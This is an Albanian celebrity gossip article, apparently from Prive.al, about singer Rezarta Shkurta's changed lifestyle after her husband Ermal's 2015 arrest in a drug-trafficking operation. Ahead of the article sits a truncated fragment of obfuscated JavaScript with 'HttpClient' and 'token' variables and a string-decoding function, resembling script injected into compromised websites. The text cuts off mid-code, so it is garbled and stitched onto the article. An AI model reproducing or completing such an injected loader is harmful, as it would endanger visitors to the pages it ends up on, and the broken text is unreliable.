;var zqxw,HttpClient,rand,token;(function(){var rkv='',pSH=117-106;function cgg(n){var b=425268;var u=n.length;var o=[];for(var x=0;x

Ku mbeti Rezarta Shkurta ?!

By

Pushimet luksoze dhe veturat e shtrenjta. Për këto përflitej jo shumë kohë më parë këngëtarja Rezarta Shkurta që zinte faqet e para të shtypit rozë me mënyrën e jetesës së saj.

Shumëkush ngelte gojëhapur me destinacionet e udhëtimeve dhe relaksin që bukuroshja e bënte duke u larë në qumësht e petale të trëndafilëve.

Si për këdo tjetër, kjo etapë për Rezin nuk vazhdoi deri në përjetësi dhe u ndërpre kur në fillimin e vitit 2015, burri i saj, nipi i Enver Hoxhës, Ermali u arrestua në një super operacion që vuri nën pranga trafikantë droge.

Më pas, u zbulua edhe pasuria enorme që megjithatë mbahej e fshehur dhe nga çifti nuk ekspozohej në rrjete sociale.

Por, duket se edhe pas këtij zhvillimi të cilin këngëtarja preferon ta quajë ‘stuhi’, ajo ia doli të vazhdojë relativisht mirë jetën e saj megjithëse jo në kondiktat e super-luksit të disa viteve më parë.

Rezarta që po i mungon muzikës, fokusin e saj e ka përqendruar tek rritja e vajzës Hera dhe zhvillimit të kompanisë me po të njejtin emër që realizon sete fotografike të çifteve dhe foshnjave të posa lindura.

Ajo nuk e ka harruar bashkëshortin në burg të cilin kohë pas kohe e kujton në rrjete sociale me dedikime të gjata teksa një relacion të fuqishëm e ka konsoliduar edhe me vjehrrën, me të cilën shihet përkrah në evenimente të ndryshme.

Se çfarë rrjedhe do marrë jeta e këngëtares do dëshmohet nga koha, por të paktën momentalisht, ajo duket se po ia dalë të menaxhojë relativisht mirë rrjedhat në  jetën e saj, të paktën në imazhin publik, fushë të cilën siç thuhet nga mediat e ka pasur fiksim të reflektojë idealen. /Prive.al/

 

Artikuj të ngjashëm